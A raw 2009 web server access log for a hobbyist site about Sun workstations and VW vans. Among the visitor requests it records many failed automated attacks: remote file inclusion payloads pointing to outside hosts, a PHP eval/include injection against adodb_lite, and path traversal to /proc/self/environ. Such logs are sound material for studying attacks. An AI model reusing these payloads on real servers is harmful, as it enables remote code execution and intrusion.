98.26.93.253 - - [07/Jun/2009:10:23:47 -0400] "GET /sun_ss20/floppy.jpg HTTP/1.1" 200 12433
98.26.93.253 - - [07/Jun/2009:10:23:47 -0400] "GET /sun_ss5/ss5-newfan.jpg HTTP/1.1" 200 62474
98.26.93.253 - - [07/Jun/2009:10:23:59 -0400] "GET /sun_ss5/pdf.gif HTTP/1.1" 200 390
98.26.93.253 - - [07/Jun/2009:10:23:59 -0400] "GET /sun_ss5/ss5_1.jpg HTTP/1.1" 200 14675
98.26.93.253 - - [07/Jun/2009:10:23:59 -0400] "GET /sun_ss5/ss5_server.jpg HTTP/1.1" 200 51920
98.26.93.253 - - [07/Jun/2009:10:23:59 -0400] "GET /sun_ss5/ss5_int.jpg HTTP/1.1" 200 58136
98.26.93.253 - - [07/Jun/2009:10:23:59 -0400] "GET /sun_ss20/floppy.jpg HTTP/1.1" 200 12433
98.26.93.253 - - [07/Jun/2009:10:23:59 -0400] "GET /sun_ss5/ss5_rear.jpg HTTP/1.1" 200 42643
98.26.93.253 - - [07/Jun/2009:10:23:59 -0400] "GET /sun_ss5/ss5_jumpers.jpg HTTP/1.1" 200 39884
98.26.93.253 - - [07/Jun/2009:10:23:59 -0400] "GET /sun_ss5/ss5-newfan2.jpg HTTP/1.1" 200 29609
98.26.93.253 - - [07/Jun/2009:10:23:59 -0400] "GET /sun_ss5/ss5-newfan.jpg HTTP/1.1" 200 74139
98.26.93.253 - - [07/Jun/2009:10:24:02 -0400] "GET /favicon.ico HTTP/1.1" 200 318
66.82.162.18 - - [07/Jun/2009:10:25:03 -0400] "GET /~techrat/vw_spotters/vw_square_detail.jpg HTTP/1.1" 200 59555
65.55.106.112 - - [07/Jun/2009:10:25:42 -0400] "GET /docs/rhl-rg-6.1en/s1-modules-cdromparameters.html HTTP/1.1" 304 -
59.56.108.202 - - [07/Jun/2009:10:26:00 -0400] "GET http://116.0.22.245/prxjdg.cgi?en HTTP/1.0" 404 204
59.56.108.202 - - [07/Jun/2009:10:26:01 -0400] "GET http://116.0.22.245/prxjdg.cgi?en HTTP/1.0" 404 204
59.56.108.202 - - [07/Jun/2009:10:26:02 -0400] "GET http://116.0.22.245/prxjdg.cgi?en HTTP/1.0" 404 204
59.56.108.202 - - [07/Jun/2009:10:26:02 -0400] "GET http://116.0.22.245/prxjdg.cgi?en HTTP/1.0" 404 204
77.221.130.2 - - [07/Jun/2009:10:26:02 -0400] "GET /logs/access_log//include/admin.lib.inc.php?site_path=http://www.wdiet.co.kr//skin_shop/.../cms/idus.txt??? HTTP/1.1" 404 248
77.221.130.2 - - [07/Jun/2009:10:26:02 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.wdiet.co.kr//skin_shop/.../cms/idus.txt??? HTTP/1.1" 404 232
77.221.130.2 - - [07/Jun/2009:10:26:02 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wdiet.co.kr//skin_shop/.../cms/idus.txt??? HTTP/1.1" 404 237
66.235.124.132 - - [07/Jun/2009:10:26:29 -0400] "GET /robots.txt HTTP/1.1" 404 216
66.235.124.132 - - [07/Jun/2009:10:26:30 -0400] "GET /dec/multia/ HTTP/1.1" 200 10529
66.235.124.132 - - [07/Jun/2009:10:26:30 -0400] "GET /dec/multia/multia.gif HTTP/1.1" 200 38340
66.235.124.132 - - [07/Jun/2009:10:26:30 -0400] "GET /dec/multia/multia2.jpg HTTP/1.1" 200 9340
66.235.124.132 - - [07/Jun/2009:10:26:30 -0400] "GET /dec/multia/mutlia_cpu.jpg HTTP/1.1" 200 17254
66.235.124.132 - - [07/Jun/2009:10:26:30 -0400] "GET /dec/multia/multia_mb.jpg HTTP/1.1" 200 26298
66.235.124.132 - - [07/Jun/2009:10:26:30 -0400] "GET /dec/multia/multia_intel.jpg HTTP/1.1" 200 8030
66.235.124.132 - - [07/Jun/2009:10:26:30 -0400] "GET /dec/multia/multia_intel2.jpg HTTP/1.1" 200 34442
66.235.124.132 - - [07/Jun/2009:10:26:30 -0400] "GET /dec/multia/pdf.gif HTTP/1.1" 200 390
66.249.71.67 - - [07/Jun/2009:10:26:42 -0400] "GET /sunFAQ/sun3mousepad.html HTTP/1.1" 200 1555
77.221.130.2 - - [07/Jun/2009:10:26:46 -0400] "GET /logs/error_log//include/admin.lib.inc.php?site_path=http://www.wdiet.co.kr//skin_shop/.../cms/idus.txt??? HTTP/1.1" 404 247
67.53.172.254 - - [07/Jun/2009:10:26:54 -0400] "GET /sun_ss5/ HTTP/1.1" 200 14917
66.235.124.69 - - [07/Jun/2009:10:27:17 -0400] "GET /%7Etechrat/new_rear2.jpg HTTP/1.0" 200 41923
218.246.20.221 - - [07/Jun/2009:10:27:49 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 225
218.246.20.221 - - [07/Jun/2009:10:27:49 -0400] "GET /logs/error_log.2%20%20/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 239
89.248.160.241 - - [07/Jun/2009:10:28:03 -0400] "POST /conf/conf.cgi HTTP/1.1" 404 219
72.30.142.225 - - [07/Jun/2009:10:28:58 -0400] "GET /docs/vim-common-5.4/syntax/lua.vim HTTP/1.0" 200 5019
190.144.44.36 - - [07/Jun/2009:10:30:15 -0400] "GET /logs/access_log//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 248
190.144.44.36 - - [07/Jun/2009:10:30:15 -0400] "GET //include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 232
190.144.44.36 - - [07/Jun/2009:10:30:15 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 237
72.30.142.225 - - [07/Jun/2009:10:30:26 -0400] "GET /docs/eject-2.0.2/?D=D HTTP/1.0" 200 842
71.229.127.15 - - [07/Jun/2009:10:30:43 -0400] "GET /vanagon/VanagonProTraining/FuelSystems/111.jpg HTTP/1.1" 304 -
71.229.127.15 - - [07/Jun/2009:10:30:43 -0400] "GET /vanagon/VanagonProTraining/FuelSystems/113.jpg HTTP/1.1" 304 -
71.229.127.15 - - [07/Jun/2009:10:30:43 -0400] "GET /vanagon/VanagonProTraining/DigiFant/029.jpg HTTP/1.1" 304 -
71.229.127.15 - - [07/Jun/2009:10:30:43 -0400] "GET /vanagon/VanagonProTraining/FuelSystems/112.jpg HTTP/1.1" 304 -
65.55.106.137 - - [07/Jun/2009:10:30:44 -0400] "GET /docs/rhl-rg-6.1en/s1-powertools-installpre61.html HTTP/1.1" 304 -
72.30.142.225 - - [07/Jun/2009:10:30:52 -0400] "GET /docs/findutils-4.1/?N=A HTTP/1.0" 200 612
190.144.44.36 - - [07/Jun/2009:10:30:54 -0400] "GET /logs/error_log//include/admin.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 247
80.36.49.92 - - [07/Jun/2009:10:31:15 -0400] "GET /sun_ss5/ss5_server.jpg HTTP/1.1" 206 17185
80.36.49.92 - - [07/Jun/2009:10:31:15 -0400] "GET /sun_ss5/ss5_rear.jpg HTTP/1.1" 206 31268
80.36.49.92 - - [07/Jun/2009:10:31:15 -0400] "GET /sun_ss5/ss5-newfan2.jpg HTTP/1.1" 206 10934
80.36.49.92 - - [07/Jun/2009:10:31:15 -0400] "GET /sun_ss5/ss5_int.jpg HTTP/1.1" 206 38001
80.36.49.92 - - [07/Jun/2009:10:31:15 -0400] "GET /sun_ss5/ss5-newfan.jpg HTTP/1.1" 206 55465
80.36.49.92 - - [07/Jun/2009:10:31:16 -0400] "GET /favicon.ico HTTP/1.1" 200 318
65.55.208.159 - - [07/Jun/2009:10:34:41 -0400] "GET /docs/yp-tools-2.3/?S=D HTTP/1.1" 200 1321
94.71.164.4 - - [07/Jun/2009:10:36:24 -0400] "GET /sun_ss5/ HTTP/1.1" 200 14917
94.71.164.4 - - [07/Jun/2009:10:36:25 -0400] "GET /sun_ss5/ss5_1.jpg HTTP/1.1" 200 14675
94.71.164.4 - - [07/Jun/2009:10:36:25 -0400] "GET /sun_ss5/pdf.gif HTTP/1.1" 200 390
94.71.164.4 - - [07/Jun/2009:10:36:25 -0400] "GET /sun_ss5/ss5_server.jpg HTTP/1.1" 200 51920
94.71.164.4 - - [07/Jun/2009:10:36:25 -0400] "GET /sun_ss5/ss5_int.jpg HTTP/1.1" 200 58136
94.71.164.4 - - [07/Jun/2009:10:36:25 -0400] "GET /sun_ss20/floppy.jpg HTTP/1.1" 200 12433
94.71.164.4 - - [07/Jun/2009:10:36:25 -0400] "GET /sun_ss5/ss5_jumpers.jpg HTTP/1.1" 200 39884
94.71.164.4 - - [07/Jun/2009:10:36:25 -0400] "GET /sun_ss5/ss5_rear.jpg HTTP/1.1" 200 42643
94.71.164.4 - - [07/Jun/2009:10:36:26 -0400] "GET /sun_ss5/ss5-newfan.jpg HTTP/1.1" 200 27894
94.71.164.4 - - [07/Jun/2009:10:36:26 -0400] "GET /sun_ss5/ss5-newfan.jpg HTTP/1.1" 200 58904
86.90.95.73 - - [07/Jun/2009:10:37:53 -0400] "GET /sunPICS/sparc20/sparc_4.jpg HTTP/1.1" 200 25101
79.174.72.73 - - [07/Jun/2009:10:39:28 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 245
60.251.217.4 - - [07/Jun/2009:10:41:31 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.proektov.ru/id.txt?? HTTP/1.1" 404 222
89.248.160.241 - - [07/Jun/2009:10:41:32 -0400] "POST /conf/conf.cgi HTTP/1.1" 404 219
60.251.217.4 - - [07/Jun/2009:10:41:36 -0400] "GET /phphtml.php?htmlclass_path=http://www.proektov.ru/id.txt?? HTTP/1.1" 404 217
75.175.182.201 - - [07/Jun/2009:10:41:51 -0400] "GET /favicon.ico HTTP/1.1" 200 318
79.174.72.73 - - [07/Jun/2009:10:43:54 -0400] "GET /logs/error_log.4/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 262
79.174.72.73 - - [07/Jun/2009:10:43:54 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 245
79.174.72.73 - - [07/Jun/2009:10:43:55 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 250
190.10.81.13 - - [07/Jun/2009:10:44:14 -0400] "GET /~techrat/vanagon1.html HTTP/1.1" 200 6628
190.10.81.13 - - [07/Jun/2009:10:44:15 -0400] "GET /~techrat/vw_vanagon.jpg HTTP/1.1" 200 13981
190.10.81.13 - - [07/Jun/2009:10:44:17 -0400] "GET /~techrat/vanagon1.html HTTP/1.1" 200 6628
190.10.81.13 - - [07/Jun/2009:10:44:17 -0400] "GET /~techrat/microbus.jpg HTTP/1.1" 200 13707
85.108.176.100 - - [07/Jun/2009:10:44:32 -0400] "GET /~techrat/vw_spotters/ HTTP/1.1" 200 5450
85.108.176.100 - - [07/Jun/2009:10:44:32 -0400] "GET /~techrat/vw_spotters/vw_beetle_r.jpg HTTP/1.1" 200 30774
85.108.176.100 - - [07/Jun/2009:10:44:32 -0400] "GET /~techrat/vw_spotters/vw_beetle_f.jpg HTTP/1.1" 200 28153
85.108.176.100 - - [07/Jun/2009:10:44:32 -0400] "GET /~techrat/vw_spotters/vw_ghia_f.jpg HTTP/1.1" 200 22868
85.108.176.100 - - [07/Jun/2009:10:44:32 -0400] "GET /~techrat/vw_spotters/vw_ghia_r.jpg HTTP/1.1" 200 13377
85.108.176.100 - - [07/Jun/2009:10:44:32 -0400] "GET /~techrat/vw_spotters/vw_thing_f.jpg HTTP/1.1" 200 23902
85.108.176.100 - - [07/Jun/2009:10:44:32 -0400] "GET /~techrat/vw_spotters/vw_bus_f.jpg HTTP/1.1" 200 37505
85.108.176.100 - - [07/Jun/2009:10:44:33 -0400] "GET /~techrat/vw_spotters/vw_412_f.jpg HTTP/1.1" 200 11806
71.83.210.82 - - [07/Jun/2009:10:44:42 -0400] "GET /sun_ss5/ HTTP/1.1" 200 14917
71.83.210.82 - - [07/Jun/2009:10:44:42 -0400] "GET /sun_ss5/ss5_1.jpg HTTP/1.1" 200 14675
71.83.210.82 - - [07/Jun/2009:10:44:42 -0400] "GET /sun_ss5/pdf.gif HTTP/1.1" 200 390
71.83.210.82 - - [07/Jun/2009:10:44:42 -0400] "GET /sun_ss20/floppy.jpg HTTP/1.1" 200 12433
71.83.210.82 - - [07/Jun/2009:10:44:42 -0400] "GET /sun_ss5/ss5_int.jpg HTTP/1.1" 200 58136
71.83.210.82 - - [07/Jun/2009:10:44:42 -0400] "GET /sun_ss5/ss5_jumpers.jpg HTTP/1.1" 200 39884
71.83.210.82 - - [07/Jun/2009:10:44:42 -0400] "GET /sun_ss5/ss5_server.jpg HTTP/1.1" 200 51920
71.83.210.82 - - [07/Jun/2009:10:44:42 -0400] "GET /sun_ss5/ss5_rear.jpg HTTP/1.1" 200 42643
71.83.210.82 - - [07/Jun/2009:10:44:43 -0400] "GET /sun_ss5/ss5-newfan2.jpg HTTP/1.1" 200 29609
71.83.210.82 - - [07/Jun/2009:10:44:43 -0400] "GET /sun_ss5/ss5-newfan.jpg HTTP/1.1" 200 74139
71.83.210.82 - - [07/Jun/2009:10:44:43 -0400] "GET /favicon.ico HTTP/1.1" 200 318
85.108.176.100 - - [07/Jun/2009:10:44:45 -0400] "GET /~techrat/vw_spotters/vw_beetle_f.jpg HTTP/1.1" 206 25553
85.108.176.100 - - [07/Jun/2009:10:44:45 -0400] "GET /~techrat/vw_spotters/vw_beetle_r.jpg HTTP/1.1" 206 25270
85.108.176.100 - - [07/Jun/2009:10:44:45 -0400] "GET /~techrat/vw_spotters/vw_ghia_f.jpg HTTP/1.1" 206 21720
85.108.176.100 - - [07/Jun/2009:10:44:45 -0400] "GET /~techrat/vw_spotters/vw_ghia_r.jpg HTTP/1.1" 200 13377
85.108.176.100 - - [07/Jun/2009:10:44:45 -0400] "GET /~techrat/vw_spotters/vw_thing_f.jpg HTTP/1.1" 200 23902
85.108.176.100 - - [07/Jun/2009:10:44:46 -0400] "GET /~techrat/vw_spotters/vw_thing_r.jpg HTTP/1.1" 200 16248
85.108.176.100 - - [07/Jun/2009:10:44:46 -0400] "GET /~techrat/vw_spotters/vw_bus_f.jpg HTTP/1.1" 200 37505
85.108.176.100 - - [07/Jun/2009:10:44:47 -0400] "GET /~techrat/vw_spotters/vw_fast_f.jpg HTTP/1.1" 200 17997
85.108.176.100 - - [07/Jun/2009:10:44:47 -0400] "GET /~techrat/vw_spotters/vw_fast_r.jpg HTTP/1.1" 200 23628
85.108.176.100 - - [07/Jun/2009:10:44:47 -0400] "GET /~techrat/vw_spotters/vw_notch_f.jpg HTTP/1.1" 200 22171
85.108.176.100 - - [07/Jun/2009:10:44:47 -0400] "GET /~techrat/vw_spotters/vw_notch_r.jpg HTTP/1.1" 200 20478
85.108.176.100 - - [07/Jun/2009:10:44:48 -0400] "GET /~techrat/vw_spotters/vw_square_f.jpg HTTP/1.1" 200 18473
85.108.176.100 - - [07/Jun/2009:10:44:48 -0400] "GET /~techrat/vw_spotters/vw_square_r.jpg HTTP/1.1" 200 26555
85.108.176.100 - - [07/Jun/2009:10:44:48 -0400] "GET /~techrat/vw_spotters/vw_411_f.jpg HTTP/1.1" 200 22814
85.108.176.100 - - [07/Jun/2009:10:44:48 -0400] "GET /~techrat/vw_spotters/vw_411_wagen_f.jpg HTTP/1.1" 200 15909
85.108.176.100 - - [07/Jun/2009:10:44:48 -0400] "GET /~techrat/vw_spotters/vw_412_cool.jpg HTTP/1.1" 200 15107
75.175.182.201 - - [07/Jun/2009:10:45:17 -0400] "GET /favicon.ico HTTP/1.1" 200 318
202.160.188.228 - - [07/Jun/2009:10:46:04 -0400] "GET /robots.txt HTTP/1.0" 404 204
60.251.217.4 - - [07/Jun/2009:10:46:38 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.proektov.ru/id.txt?? HTTP/1.1" 404 251
60.251.217.4 - - [07/Jun/2009:10:46:42 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.proektov.ru/id.txt?? HTTP/1.1" 404 246
202.160.180.31 - - [07/Jun/2009:10:47:07 -0400] "GET /sun_ss2/ HTTP/1.0" 200 9016
98.127.31.36 - - [07/Jun/2009:10:47:59 -0400] "GET /sun_ss5/ HTTP/1.1" 200 14917
98.127.31.36 - - [07/Jun/2009:10:47:59 -0400] "GET /sun_ss5/ss5_1.jpg HTTP/1.1" 200 14675
98.127.31.36 - - [07/Jun/2009:10:47:59 -0400] "GET /sun_ss5/pdf.gif HTTP/1.1" 200 390
98.127.31.36 - - [07/Jun/2009:10:48:00 -0400] "GET /sun_ss5/ss5_server.jpg HTTP/1.1" 200 51920
98.127.31.36 - - [07/Jun/2009:10:48:00 -0400] "GET /sun_ss20/floppy.jpg HTTP/1.1" 200 12433
98.127.31.36 - - [07/Jun/2009:10:48:00 -0400] "GET /sun_ss5/ss5_int.jpg HTTP/1.1" 200 58136
98.127.31.36 - - [07/Jun/2009:10:48:00 -0400] "GET /sun_ss5/ss5_rear.jpg HTTP/1.1" 200 42643
98.127.31.36 - - [07/Jun/2009:10:48:00 -0400] "GET /sun_ss5/ss5_jumpers.jpg HTTP/1.1" 200 39884
98.127.31.36 - - [07/Jun/2009:10:48:00 -0400] "GET /sun_ss5/ss5-newfan2.jpg HTTP/1.1" 200 29609
98.127.31.36 - - [07/Jun/2009:10:48:00 -0400] "GET /sun_ss5/ss5-newfan.jpg HTTP/1.1" 200 74139
98.127.31.36 - - [07/Jun/2009:10:48:21 -0400] "GET /favicon.ico HTTP/1.1" 200 318
190.10.81.13 - - [07/Jun/2009:10:49:19 -0400] "-" 408 -
65.55.106.148 - - [07/Jun/2009:10:49:45 -0400] "GET /docs/rhl-rg-6.1en/s1-sysadmin-boot.html HTTP/1.1" 304 -
68.83.11.6 - - [07/Jun/2009:10:49:58 -0400] "GET /faq/ HTTP/1.1" 200 11077
68.83.11.6 - - [07/Jun/2009:10:49:58 -0400] "GET /faq/ide.jpg HTTP/1.1" 200 40416
68.83.11.6 - - [07/Jun/2009:10:49:58 -0400] "GET /faq/50pinscsi.jpg HTTP/1.1" 200 41828
68.83.11.6 - - [07/Jun/2009:10:49:58 -0400] "GET /faq/68pinscsi.jpg HTTP/1.1" 200 35244
68.83.11.6 - - [07/Jun/2009:10:49:58 -0400] "GET /faq/scascsi.jpg HTTP/1.1" 200 35727
68.83.11.6 - - [07/Jun/2009:10:49:58 -0400] "GET /faq/scsisetting.gif HTTP/1.1" 200 4729
68.83.11.6 - - [07/Jun/2009:10:49:58 -0400] "GET /faq/scsi.gif HTTP/1.1" 200 953
68.83.11.6 - - [07/Jun/2009:10:49:58 -0400] "GET /faq/sca_adapter_ondrive.jpg HTTP/1.1" 200 57056
68.83.11.6 - - [07/Jun/2009:10:49:58 -0400] "GET /faq/sca_adapter.jpg HTTP/1.1" 200 89442
68.83.11.6 - - [07/Jun/2009:10:50:01 -0400] "GET /favicon.ico HTTP/1.1" 200 318
77.221.130.12 - - [07/Jun/2009:10:50:10 -0400] "GET /logs/access_log/modules/TotalCalendar/about.php?inc_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 253
77.221.130.12 - - [07/Jun/2009:10:50:10 -0400] "GET /modules/TotalCalendar/about.php?inc_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 237
77.221.130.12 - - [07/Jun/2009:10:50:10 -0400] "GET /logs/error_log/modules/TotalCalendar/about.php?inc_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 252
77.221.130.12 - - [07/Jun/2009:10:50:10 -0400] "GET /logs/modules/TotalCalendar/about.php?inc_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 242
201.130.202.233 - - [07/Jun/2009:10:51:47 -0400] "GET /sun_ss5/ HTTP/1.1" 200 14917
201.130.202.233 - - [07/Jun/2009:10:51:48 -0400] "GET /sun_ss5/ss5_1.jpg HTTP/1.1" 200 14675
201.130.202.233 - - [07/Jun/2009:10:51:48 -0400] "GET /sun_ss5/pdf.gif HTTP/1.1" 200 390
201.130.202.233 - - [07/Jun/2009:10:51:48 -0400] "GET /sun_ss5/ss5_server.jpg HTTP/1.1" 200 51920
201.130.202.233 - - [07/Jun/2009:10:51:48 -0400] "GET /sun_ss20/floppy.jpg HTTP/1.1" 200 12433
201.130.202.233 - - [07/Jun/2009:10:51:48 -0400] "GET /sun_ss5/ss5_int.jpg HTTP/1.1" 200 58136
201.130.202.233 - - [07/Jun/2009:10:51:48 -0400] "GET /sun_ss5/ss5_rear.jpg HTTP/1.1" 200 42643
60.251.217.4 - - [07/Jun/2009:10:51:48 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.proektov.ru/id.txt?? HTTP/1.1" 404 251
201.130.202.233 - - [07/Jun/2009:10:51:48 -0400] "GET /sun_ss5/ss5_jumpers.jpg HTTP/1.1" 200 39884
201.130.202.233 - - [07/Jun/2009:10:51:48 -0400] "GET /sun_ss5/ss5-newfan2.jpg HTTP/1.1" 200 29609
60.251.217.4 - - [07/Jun/2009:10:51:48 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.proektov.ru/id.txt?? HTTP/1.1" 404 246
201.130.202.233 - - [07/Jun/2009:10:51:48 -0400] "GET /sun_ss5/ss5-newfan.jpg HTTP/1.1" 200 74139
201.130.202.233 - - [07/Jun/2009:10:51:50 -0400] "GET /favicon.ico HTTP/1.1" 200 318
60.251.217.4 - - [07/Jun/2009:10:52:02 -0400] "GET /logs/access_log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.proektov.ru/id.txt?? HTTP/1.1" 404 264
89.248.160.241 - - [07/Jun/2009:10:55:02 -0400] "POST /conf/conf.cgi HTTP/1.1" 404 219
65.99.196.153 - - [07/Jun/2009:10:56:05 -0400] "GET /conf/conf.cgi HTTP/1.0" 404 207
200.65.129.2 - - [07/Jun/2009:10:56:06 -0400] "GET /conf/conf.cgi HTTP/1.1" 404 219
213.21.33.91 - - [07/Jun/2009:10:56:07 -0400] "GET /conf/conf.cgi HTTP/1.1" 404 219
65.55.106.158 - - [07/Jun/2009:10:57:41 -0400] "GET /sunFAQ/serial/index.html HTTP/1.1" 304 -
64.182.124.1 - - [07/Jun/2009:11:01:13 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 270
64.182.124.1 - - [07/Jun/2009:11:01:13 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 275
74.6.17.164 - - [07/Jun/2009:11:02:34 -0400] "GET /robots.txt HTTP/1.0" 404 204
74.6.17.164 - - [07/Jun/2009:11:02:34 -0400] "GET /next/ HTTP/1.0" 200 6924
77.221.130.2 - - [07/Jun/2009:11:02:34 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 245
77.221.130.2 - - [07/Jun/2009:11:02:35 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 240
77.221.130.2 - - [07/Jun/2009:11:02:37 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 240
77.221.130.2 - - [07/Jun/2009:11:02:37 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 245
77.221.130.2 - - [07/Jun/2009:11:02:43 -0400] "GET /logs/access_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 256
77.221.130.2 - - [07/Jun/2009:11:02:47 -0400] "GET /logs/access_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 256
65.55.208.163 - - [07/Jun/2009:11:03:25 -0400] "GET /docs/console-tools-19990302/dvorak/dvorak-l.xmodmap HTTP/1.1" 304 -
77.221.130.2 - - [07/Jun/2009:11:03:54 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 260
77.221.130.2 - - [07/Jun/2009:11:03:54 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 255
72.30.142.225 - - [07/Jun/2009:11:03:57 -0400] "GET /docs/vim-common-5.4/syntax/manual.vim HTTP/1.0" 200 716
77.221.130.2 - - [07/Jun/2009:11:04:03 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 260
77.221.130.2 - - [07/Jun/2009:11:04:03 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 255
77.221.130.2 - - [07/Jun/2009:11:04:04 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 255
77.221.130.2 - - [07/Jun/2009:11:04:04 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 260
77.221.130.2 - - [07/Jun/2009:11:04:13 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 255
77.221.130.2 - - [07/Jun/2009:11:04:15 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 260
222.231.1.113 - - [07/Jun/2009:11:04:25 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 215
222.231.1.113 - - [07/Jun/2009:11:04:25 -0400] "GET /logs/access_log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 233
222.231.1.113 - - [07/Jun/2009:11:04:25 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 220
77.221.130.2 - - [07/Jun/2009:11:04:26 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 260
77.221.130.2 - - [07/Jun/2009:11:04:26 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 255
222.231.1.113 - - [07/Jun/2009:11:04:28 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 215
222.231.1.113 - - [07/Jun/2009:11:04:28 -0400] "GET /logs/access_log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 233
222.231.1.113 - - [07/Jun/2009:11:04:28 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 220
78.52.210.25 - - [07/Jun/2009:11:04:29 -0400] "GET /~techrat/vw_spotters/ HTTP/1.1" 200 5450
78.52.210.25 - - [07/Jun/2009:11:04:30 -0400] "GET /~techrat/vw_spotters/vw_411_f.jpg HTTP/1.1" 200 22814
78.52.210.25 - - [07/Jun/2009:11:04:31 -0400] "GET /favicon.ico HTTP/1.1" 200 318
